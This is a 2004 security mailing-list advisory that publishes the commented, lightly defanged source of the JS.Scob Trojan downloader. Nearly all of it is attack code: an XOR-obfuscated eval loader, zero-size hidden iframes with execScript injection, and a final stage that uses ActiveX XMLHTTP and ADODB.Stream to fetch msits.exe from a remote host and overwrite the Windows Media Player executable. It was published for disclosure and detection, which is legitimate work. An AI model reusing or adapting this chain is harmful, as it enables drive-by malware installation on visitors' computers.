[NEWS] JS.Scob.Trojan Source Code Released
From: SecuriTeam (support_at_securiteam.com)
Date: 07/01/04
To: list@securiteam.com Date: 1 Jul 2004 17:23:14 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
JS.Scob.Trojan Source Code Released
------------------------------------------------------------------------
SUMMARY
The source code for the JS.SCob Trojan downloader is available. By
inspecting the source code of JS.SCob you can see how the malicious
JavaScript downloads the malicious program using an invisible IFRAME in
order to compromise a system. It also shows how the Trojan uses the footer
feature of Microsoft's IIS in order to be served to client browsers without
actually modifying any files on the IIS server, and how it uses a
hidden cookie to periodically attempt a connection to the remote site that
contains the malware.
DETAILS
Vulnerable Systems:
* IIS version 5.0
Note: All SCRIPT tags and "javascript" language names in the code have been
replaced with harmless variants ("scr!pt", "javascr!pt") for security reasons.
The order of script redirection is as follows:
Compromised -(redirect)-> http://217.107.218.***/dot.php -(redirect)->
new.htm -(execute)-> md.htm & shellscr!pt_loader.js -(execute)->
shellscr!pt.js -(install)-> msits.exe
The code for the relevant parts is shown below:
--------------------------------- Begin Code: new.htm
---------------------------------
<!-- new.htm, stage 1: defines the function that stage 2 (below) copies into the hidden
     iframe with execScript(). Defanged listing: "scr!pt"/"javascr!pt" stand in for the
     real tag and language names throughout this advisory. -->
<scr!pt language="Javascr!pt">
// Opens md.htm as a modal dialog placed off-screen (dialogTop/dialogLeft -10000, 1x1 size)
// and hands it `window` as dialogArguments. md.htm echoes dialogArguments back as its
// return value, so the value returned here is a window object, and its .location is then
// set to a javascript: URL that writes a SCRIPT tag loading shellscr!pt_loader.js from
// the masked 217.107.218.*** host. Which window ends up navigated depends on IE's
// showModalDialog() semantics of the time — NOTE(review): not verifiable from this listing.
// Detection angle: showModalDialog() with negative dialogTop/dialogLeft plus a javascript:
// URL assigned to .location is a distinctive combination in page content.
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-
10000\;dialogHeight:1\;dialogWidth:1\;").location="javascr!pt'<SCR!PT
SRC=\\'http://217.107.218.***/shellscr!pt_loader.js\\'><\/scr!pt>'";
}</scr!pt>
<!-- new.htm, stage 2: two timers. The first (100 ms) evaluates the source text of
     InjectedDuringRedirection inside the iframe's script context via execScript(), so the
     function gets defined in the frame; the second (101 ms) calls it there. The
     document.write() at the end creates the zero-size frame before either timer fires. -->
<scr!pt
language="javascr!pt">setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100
);
// 1 ms after the definition is injected, run it in the frame.
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
// Hidden frame: WIDTH=0 HEIGHT=0, initial content from redir.php (not shown in this
// advisory). Detection angle: zero-size IFRAME plus execScript() on a frame is a
// recognizable pattern in injected page footers.
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=0
HEIGHT=0></IFRAME>');</scr!pt>
<!-- new.htm, stage 3: an obfuscated script body that is decoded at runtime and passed to
     eval(). The decoded text is not reproduced in this advisory. -->
<scr!pt>
// Initial XOR key; the loop below increments it once per decoded character.
x=34;
// Semicolon-separated numeric tokens, one per character of the hidden script.
es="84;66;86;5;73;119;71;89;95;91;12;16;14;88;89;95;86;92;67;27;85;69;9
3;88;78;94;108;82;78;74;48;105;107;120;73;79;48;38;58;105;37;9;35;41;55
;111;109;113;61;3;59;37;35;39;118;61;53;56;41;48;59;49;20;79;0;12;0;28;
93;106;98;6;40;4;8;20;64;28;4;8;30;22;90;23;23;20;19;30;8;20;9;19;26;60
;239;237;237;241;164;184;166;165;255;225;227;255;233;175;181;130;154;25
4;208;252;240;236;184;228;236;224;246;254;178;255;241;237;196;196;208;1
31;153;133;132;208;192;192;222;206;140;156;222;215;146;138;191;185;219;
247;217;211;193;151;211;213;210;216;204;247;148;140;142;254;227;249;169
;165;162;172;169;191;236;169;175;187;177;236;242;241;153;134;251;158;14
0;138;224;182;180;169;179;179;218;135;139;143;129;223;201;200;171;211;1
82;183;161;172;167;161;222;188;186;167;213;157;130;131;136;195;213;212;
206;204;201;209;305;305;309;301;310;308;318;297;313;317;317;292;291;352
;367;358;382;319;369;379;377;303;300;312;373;376;371;373;306;373;362;37
0;258;257;342;346;340;320;283;261;348;332;338;351;259;341;259;348;339;3
23;347;323;320;345;339;323;282;263;262;276;339;351;340;346;291;309;380;
356;383;328;332;296;280;294;314;318;316;355;317;295;319;294;378;358;356
;357;358;379;376;364;362;363;364;369;382;366;332;321;339;335;324;257;26
5;260;285;260;271;261;280;323;268;256;276;264;347;328;";
// split(";") leaves an empty last element because es ends with ';'; k=length-1 skips it.
var ds=new String(); ads=es.split(";"); k=ads.length-1;
// Each token (string, coerced to a number by ^) is XORed with the running key x, x is
// bumped by one, and the result becomes one character of ds; eval(ds) then executes the
// rebuilt script. Detection angle: a fromCharCode loop over a large numeric literal that
// feeds eval() is a common obfuscation signature worth alerting on.
for(var j=0;j<k;j++)
{e=ads[j];d=e^x;x+=1;ds=ds+String.fromCharCode(d);}eval(ds)
</scr!pt>
---------------------------------- End Code: new.htm
----------------------------------
--------------------------------- Begin Code: shellscr!pt_loader.js
---------------------------------
// shellscr!pt_loader.js: creates a hidden about:blank iframe named myiframe, then 100 ms
// later writes a SCRIPT tag into it that loads shellscr!pt.js (the final stage) from the
// masked 217.107.218.**** host. The host is masked with four characters here versus
// three in new.htm — presumably only the advisory's redaction differs; not verifiable here.
// Detection angle: document.write of a SCRIPT tag into a zero-size frame via setTimeout.
function getRealShell() {
myiframe.document.write("<SCR!PT
SRC='http://217.107.218.****/shellscr!pt.js'><\/SCR!PT>");
} document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=0
HEIGHT=0></IFRAME>"); setTimeout("getRealShell()",100);
---------------------------------- End Code: shellscr!pt_loader.js
----------------------------------
--------------------------------- Begin Code: shellscr!pt.js
---------------------------------
// shellscr!pt.js: the final stage. Every sensitive string is assembled from unescape()
// pieces and concatenation so that the ActiveX ProgIDs and the target path never appear
// literally — a plain signature-evasion trick. Decoding the %XX escapes:
//   szExt=".exe"  szM="m" (so szMMS="mms://")  szSTR="Stream"  szADO="ADODB.Stream"
//   szWIN="Windows"  szHTTP="Microsoft.XMLHTTP"  METHOD="GET"  xx1="Media"  xx2="Player"
//   MP1="C:\\Program" (unescape yields two literal backslashes after the drive letter)
// Detection angle: the pair Microsoft.XMLHTTP + ADODB.Stream.SaveToFile instantiated from
// browser script is the indicator to alert on; the resulting file path below is the IoC.
var szExt = unescape("%2E%65%78%65");
var szM = unescape("%6D");
var szMMS = szM + szM + "s://";
var szSTR= unescape("%53%74%72%65%61%6D");
var szADO = unescape("%41%44%4F%44%42%2E") + szSTR;
var szMS = "Microsoft"; var szWIN = unescape("%57%69%6E%64%6F%77%73");
var szHTTP = szMS + unescape("%2E%58%4D%4C%48%54%54%50");
// XMLHTTP request object; METHOD decodes to "GET".
var HTTP = new ActiveXObject(szHTTP); var METHOD =
unescape("%47%45%54");
var xx1=unescape("%4D%65%64%69%61"); var xx2 =
unescape("%50%6C%61%79%65%72");
var MP1=unescape("%43%3A%5C%5C%50%72%6F%67%72%61%6D"); var MP2 = " " + xx1
+ " " + xx2;
var szPL = "pl";
// MP = "C:\\Program Files\Windows Media Player\wmplayer.exe": the downloaded binary is
// written over (or created at) the Windows Media Player executable path.
var MP = MP1 + " Files\\" + szWIN + MP2 + "\\wm" + szPL +
unescape("%61%79%65%72") + szExt;
// Remote payload; last octet masked in the advisory.
var szURL = "http://217.107.218.***/msits.exe";
// i=3 and t=1 are computed rather than written as literals (more literal-hiding).
var i = 8 - 5;
// Third argument i-3 = 0: a synchronous request, so responseBody is ready after Send().
var t = 7 - 6; HTTP.Open(METHOD, szURL, i-3); HTTP.Send();
var ADO = new ActiveXObject(szADO);
// ADO enum values: Mode=3 is adModeReadWrite, Type=1 is adTypeBinary.
ADO.Mode = i; ADO.Type = t;
ADO.Open(); ADO.Write(HTTP.responseBody);
// SaveToFile(MP, 2): 2 is adSaveCreateOverWrite, so an existing file at MP is replaced.
// Then navigates to "mms://" — presumably to have the handler registered for that
// protocol start the file just written; NOTE(review): the handler binding is not shown here.
ADO.SaveToFile(MP, i-t); location.href=szMMS;
---------------------------------- End Code: shellscr!pt.js
----------------------------------
--------------------------------- Begin Code: md.htm
---------------------------------
<!-- md.htm: the page new.htm opens with showModalDialog(). It returns the opener window
     to the caller and keeps the dialog alive only while the opener's URL stays readable. -->
<SCR!PT language="javascr!pt">
// Echo the opener's dialogArguments (the window passed in) back as the dialog's return value.
window.returnValue = window.dialogArguments;
// Polls every 100 ms. Reading the opener's location.href succeeds while the dialog is
// allowed to see it; once that read throws (presumably after the opener navigated to a
// location this page may not read — confirm), the dialog closes and showModalDialog()
// returns in new.htm. The setTimeout after window.close() is still scheduled; harmless here.
function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close
();}
setTimeout("CheckStatus()",100);
}
CheckStatus();
</SCR!PT>
---------------------------------- End Code: md.htm
----------------------------------
ADDITIONAL INFORMATION
The information has been provided by <mailto:Special-Alerts@k-otik.com>
K-OTiK Security.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.